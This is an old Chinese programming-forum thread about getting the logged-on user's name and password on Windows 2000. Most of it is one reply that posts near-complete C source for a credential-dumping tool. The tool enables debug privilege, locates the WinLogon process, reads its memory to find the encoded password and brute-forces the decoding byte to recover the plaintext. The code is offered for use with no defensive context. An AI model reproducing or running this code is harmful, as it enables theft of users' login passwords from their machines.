Win2000下如何得到本机登陆的用户及其密码?
密码能得到吗? 问题点数:0、回复次数:8Top
1 楼vpro(IT_Boy)回复于 2003-10-04 11:54:01 得分 0
用户名Top
2 楼tobetter(豆豆)回复于 2003-10-04 16:17:21 得分 0
API函数能获取用户名,但口令不能获取.Top
3 楼psbeond(LibUIDK界面库客服)回复于 2003-10-04 16:43:17 得分 0
在windows2000下,是可以得到明文用户名和密码的,是从缓存里得的,我有现成的原代码,遗憾的是不在手头,代码不长,也就100行左右,但难度挺高,我只是告诉你这个可以实现Top
4 楼young_t(清澈见底)回复于 2003-10-04 22:48:06 得分 0
GetPasswordWin2K()
{
CString m_csPass;
DWORD i, Hash = 0;
UNICODE_STRING EncodedString;
EncodedString.Length =
(USHORT) PasswordLength * sizeof (wchar_t);
EncodedString.MaximumLength =
((USHORT) PasswordLength * sizeof (wchar_t)) + sizeof (wchar_t);
EncodedString.Buffer =
(PWSTR) HeapAlloc
(GetProcessHeap (),
HEAP_ZERO_MEMORY,
EncodedString.MaximumLength);
// This is a brute force technique since the hash-byte
// is not stored as part of the encoded string - :>(.
for (i = 0; i <= 0xff; i++)
{
CopyMemory
(EncodedString.Buffer,
PasswordP,
PasswordLength * sizeof (wchar_t));
// Finally - try to decode the password.
pfnRtlRunDecodeUnicodeString((BYTE) i, &EncodedString);
// Check for a viewable password.
PBYTE p = (PBYTE) EncodedString.Buffer;
BOOL Viewable = TRUE;
DWORD j, k;
for (j = 0; (j < PasswordLength) && Viewable; j++)
{
if ((*p)
&&
(* (PBYTE)(DWORD (p) + 1) == 0))
{
if (*p < 0x20)
Viewable = FALSE;
if (*p > 0x7e)
Viewable = FALSE;
}
else
Viewable = FALSE;
k = DWORD (p);
k++; k++;
p = (PBYTE) k;
}
if (Viewable)
{
char m_cTemp[255];
WideCharToMultiByte(CP_ACP,0,EncodedString.Buffer,-1,m_cTemp,255,NULL,NULL);
m_csPass=m_cTemp;
TRACE("The hash byte is: 0x%2.2x.\n",i);
break;
}
}
HeapFree(GetProcessHeap(), 0, EncodedString.Buffer);
return m_csPass;
}
LocatePasswordPageWin2K(DWORD WinLogonPID, PDWORD PasswordLength)
{
#define USER_DOMAIN_OFFSET_WIN2K 0x400
#define USER_PASSWORD_OFFSET_WIN2K 0x800
HANDLE WinLogonHandle =
OpenProcess
(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
FALSE,
WinLogonPID);
if (WinLogonHandle == 0)
return FALSE;
*PasswordLength = 0;
SYSTEM_INFO SystemInfo;
GetSystemInfo(&SystemInfo);
DWORD i = (DWORD) SystemInfo.lpMinimumApplicationAddress;
DWORD MaxMemory = (DWORD) SystemInfo.lpMaximumApplicationAddress;
DWORD Increment = SystemInfo.dwPageSize;
MEMORY_BASIC_INFORMATION MemoryBasicInformation;
while (i < MaxMemory)
{
if (VirtualQueryEx
(WinLogonHandle,
(PVOID) i,
&MemoryBasicInformation,
sizeof (MEMORY_BASIC_INFORMATION)))
{
Increment = MemoryBasicInformation.RegionSize;
if (((MemoryBasicInformation.State & MEM_COMMIT) == MEM_COMMIT)
&&
((MemoryBasicInformation.Protect & PAGE_GUARD) == 0))
{
PVOID RealStartingAddressP =
HeapAlloc
(GetProcessHeap (),
HEAP_ZERO_MEMORY,
MemoryBasicInformation.RegionSize);
DWORD BytesCopied = 0;
if (ReadProcessMemory
(WinLogonHandle,
(PVOID) i,
RealStartingAddressP,
MemoryBasicInformation.RegionSize,
&BytesCopied))
{
if ((wcscmp ((wchar_t *) RealStartingAddressP, UserName) == 0)
&&
(wcscmp ((wchar_t *) ((DWORD) RealStartingAddressP + USER_DOMAIN_OFFSET_WIN2K), UserDomain) == 0))
{
RealPasswordP = (PVOID) (i + USER_PASSWORD_OFFSET_WIN2K);
PasswordP = (PVOID) ((DWORD) RealStartingAddressP + USER_PASSWORD_OFFSET_WIN2K);
// Calculate the length of encoded unicode string.
PBYTE p = (PBYTE) PasswordP;
DWORD Loc = (DWORD) p;
DWORD Len = 0;
if ((*p == 0) && (* (PBYTE) ((DWORD) p + 1) == 0))
;
else
do
{
Len++;
Loc += 2;
p = (PBYTE) Loc;
} while(*p != 0);
*PasswordLength = Len;
CloseHandle
(WinLogonHandle);
return TRUE;
}
}
HeapFree(GetProcessHeap(), 0, RealStartingAddressP);
}
}
else
Increment = SystemInfo.dwPageSize;
// Move to next memory block.
i += Increment;
}
CloseHandle(WinLogonHandle);
return FALSE;
}
FindWinLogon()
{
#define INITIAL_ALLOCATION 0x100
DWORD rc = 0;
DWORD SizeNeeded = 0;
PVOID InfoP = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, INITIAL_ALLOCATION);
// Find how much memory is required.
pfnNtQuerySystemInformation(0x10, InfoP, INITIAL_ALLOCATION, &SizeNeeded);
HeapFree(GetProcessHeap(), 0, InfoP);
// Now, allocate the proper amount of memory.
InfoP = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, SizeNeeded);
DWORD SizeWritten = SizeNeeded;
if (pfnNtQuerySystemInformation(0x10, InfoP, SizeNeeded, &SizeWritten))
{
HeapFree(GetProcessHeap(), 0, InfoP);
return (0);
}
DWORD NumHandles = SizeWritten / sizeof (QUERY_SYSTEM_INFORMATION);
if (NumHandles == 0)
{
HeapFree(GetProcessHeap (), 0, InfoP);
return (0);
}
PQUERY_SYSTEM_INFORMATION QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION) InfoP;
DWORD i;
for (i = 1; i <= NumHandles; i++)
{
// "5" is the value of a kernel object type process.
if (QuerySystemInformationP->HandleType == 5)
{
PVOID DebugBufferP = pfnRtlCreateQueryDebugBuffer(0, 0);
if (pfnRtlQueryProcessDebugInformation
(QuerySystemInformationP->PID, 1, DebugBufferP) == 0)
{
PPROCESS_INFO_HEADER ProcessInfoHeaderP =
(PPROCESS_INFO_HEADER) ((DWORD) DebugBufferP + 0x60);
DWORD Count = ProcessInfoHeaderP->Count;
PPROCESS_INFO ProcessInfoP =
(PPROCESS_INFO) ((DWORD) ProcessInfoHeaderP + sizeof (PROCESS_INFO_HEADER));
if (strstr (_strupr (ProcessInfoP->Name), "WINLOGON") != 0)
{
DWORD i;
DWORD dw = (DWORD) ProcessInfoP;
for (i = 0; i < Count; i++)
{
dw += sizeof (PROCESS_INFO);
ProcessInfoP = (PPROCESS_INFO) dw;
if (strstr (_strupr (ProcessInfoP->Name), "NWGINA") != 0)
return (0);
if (strstr (_strupr (ProcessInfoP->Name), "MSGINA") == 0)
rc = QuerySystemInformationP->PID;
}
if (DebugBufferP)
pfnRtlDestroyQueryDebugBuffer(DebugBufferP);
HeapFree(GetProcessHeap(), 0, InfoP);
return (rc);
}
}
if (DebugBufferP)
{
pfnRtlDestroyQueryDebugBuffer(DebugBufferP);
}
}
DWORD dw = (DWORD) QuerySystemInformationP;
dw += sizeof (QUERY_SYSTEM_INFORMATION);
QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION) dw;
}
HeapFree(GetProcessHeap(), 0, InfoP);
return (rc);
}
代码一堆,自己研究吧,不知道我贴完没有。看看再说。
Top
5 楼young_t(清澈见底)回复于 2003-10-04 22:50:37 得分 0
GetUseNameAndPassWord()
{
HANDLE Token;
TOKEN_PRIVILEGES TokenPrivileges, PreviousState;
DWORD ReturnLength = 0;
if ((!IsWinNT ()) && (!IsWin2K ()))
{
TRACE("Windows NT or Windows 2000 are required.\n");
return false;
}
// Add debug privilege to PasswordReminder -
// this is needed for the search for Winlogon.
if (OpenProcessToken(GetCurrentProcess (),TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,&Token))
if (LookupPrivilegeValue(NULL, "SeDebugPrivilege", &TokenPrivileges.Privileges[0].Luid))
{
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(!AdjustTokenPrivileges
(Token,
FALSE,
&TokenPrivileges,
sizeof (TOKEN_PRIVILEGES),
&PreviousState,
&ReturnLength))
{
TRACE("Unable to add debug privilege.\n");
return false;
}
}
else
{
TRACE("Unable to add debug privilege.\n");
return false;
}
else
{
TRACE("Unable to add debug privilege.\n");
return false;
}
TRACE("The debug privilege has been added to PasswordReminder.\n");
HINSTANCE hNtDll = LoadLibrary("NTDLL.DLL");
pfnNtQuerySystemInformation =
(PFNNTQUERYSYSTEMINFORMATION) GetProcAddress
(hNtDll,
"NtQuerySystemInformation");
pfnRtlCreateQueryDebugBuffer =
(PFNRTLCREATEQUERYDEBUGBUFFER) GetProcAddress
(hNtDll,
"RtlCreateQueryDebugBuffer");
pfnRtlQueryProcessDebugInformation =
(PFNRTLQUERYPROCESSDEBUGINFORMATION) GetProcAddress
(hNtDll,
"RtlQueryProcessDebugInformation");
pfnRtlDestroyQueryDebugBuffer =
(PFNRTLDESTROYQUERYDEBUGBUFFER) GetProcAddress
(hNtDll,
"RtlDestroyQueryDebugBuffer");
pfnRtlRunDecodeUnicodeString =
(PFNTRTLRUNDECODEUNICODESTRING) GetProcAddress
(hNtDll,
"RtlRunDecodeUnicodeString");
// Locate WinLogon's PID - need debug privilege and admin rights.
DWORD WinLogonPID = FindWinLogon ();
if (WinLogonPID == 0)
{
TRACE("PasswordReminder is unable to find WinLogon or you are using NWGINA.DLL.\n");
TRACE("PasswordReminder is unable to find the password in memory.\n");
FreeLibrary (hNtDll);
return false;
}
TRACE("The WinLogon process id is %d (0x%8.8lx).\n", WinLogonPID, WinLogonPID);
// Set values to check memory block against.
memset(UserName, 0, sizeof (UserName));
memset(UserDomain, 0, sizeof (UserDomain));
GetEnvironmentVariableW(L"USERNAME", UserName, 0x400);
GetEnvironmentVariableW(L"USERDOMAIN", UserDomain, 0x400);
// Locate the block of memory containing
// the password in WinLogon's memory space.
BOOL FoundPasswordPage = FALSE;
if (IsWin2K ())
{
FoundPasswordPage = LocatePasswordPageWin2K(WinLogonPID, &PasswordLength);
}
else
FoundPasswordPage = LocatePasswordPageWinNT(WinLogonPID, &PasswordLength);
if (FoundPasswordPage)
{
char m_cTemp[255];
WideCharToMultiByte(CP_ACP,0,UserName,-1,m_cTemp,255,NULL,NULL);
g_csUseaNAME=m_cTemp;
if (PasswordLength == 0)
{
TRACE("The logon information is: %S/%S.\n", UserDomain, UserName);
TRACE("There is no password.\n");
}
else
{
TRACE("The encoded password is found at 0x%8.8lx and has a length of %d.\n",
RealPasswordP,
PasswordLength);
// Decode the password string.
if (IsWin2K ())
g_csPassWord=GetPasswordWin2K ();
else
g_csPassWord=GetPasswordWinNT ();
}
}
else
TRACE("PasswordReminder is unable to find the password in memory.\n");
FreeLibrary (hNtDll);
return true;
}
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
// Undocumented typedef's
typedef struct _QUERY_SYSTEM_INFORMATION
{
DWORD GrantedAccess;
DWORD PID;
WORD HandleType;
WORD HandleId;
DWORD Handle;
} QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION;
typedef struct _PROCESS_INFO_HEADER
{
DWORD Count;
DWORD Unk04;
DWORD Unk08;
} PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER;
typedef struct _PROCESS_INFO
{
DWORD LoadAddress;
DWORD Size;
DWORD Unk08;
DWORD Enumerator;
DWORD Unk10;
char Name [0x108];
} PROCESS_INFO, *PPROCESS_INFO;
typedef struct _ENCODED_PASSWORD_INFO
{
DWORD HashByte;
DWORD Unk04;
DWORD Unk08;
DWORD Unk0C;
FILETIME LoggedOn;
DWORD Unk18;
DWORD Unk1C;
DWORD Unk20;
DWORD Unk24;
DWORD Unk28;
UNICODE_STRING EncodedPassword;
} ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO;
typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD);
typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD);
typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID);
typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID);
typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING);
PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation;
PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer;
PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation;
PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer;
PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString;
忘了,还有这一些。。这样好像完整了。
Top
6 楼vpro(IT_Boy)回复于 2003-10-05 17:00:04 得分 0
哇赛!好厉害,看来我只用用户名算了,谢谢!Top
7 楼wzswgbx(我总是问个不休)回复于 2003-10-06 18:43:25 得分 0
帅哥,帖完整吧,好吗Top
8 楼young_t(清澈见底)回复于 2003-10-07 16:45:37 得分 0
好像贴完了吧。Top
